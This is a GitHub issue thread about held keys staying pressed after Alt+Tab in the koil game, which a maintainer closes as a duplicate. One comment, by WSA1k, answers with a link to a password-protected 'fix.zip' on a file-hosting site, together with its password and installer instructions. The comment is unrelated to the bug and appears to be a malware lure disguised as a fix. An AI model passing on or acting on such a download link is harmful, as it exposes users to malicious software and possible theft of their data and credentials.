### ISSUE TITLE
Held keys are not "released" when window loses focus

### ISSUE THREAD

**Issue by geajack** [tsoding/koil#36] opened 2024-08-26 12:00 UTC
If I hold a key like say W, and then Alt+Tab to a different window, the W key is still held down while the game is out of focus. If I come back, my character continues to move forward even if I'm no longer holding W. I have to tap the W key to get back to a normal state.

**Comment by WSA1k** [comment] 2024-08-26 12:19
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rexim** [comment] 2024-08-26 21:55
Yeah it's a known issue, we will fix it eventually. Right now we are just figuring out what the game is about. :)

Duplicate of #28

**Closed by rexim** 2024-08-26 21:55 UTC
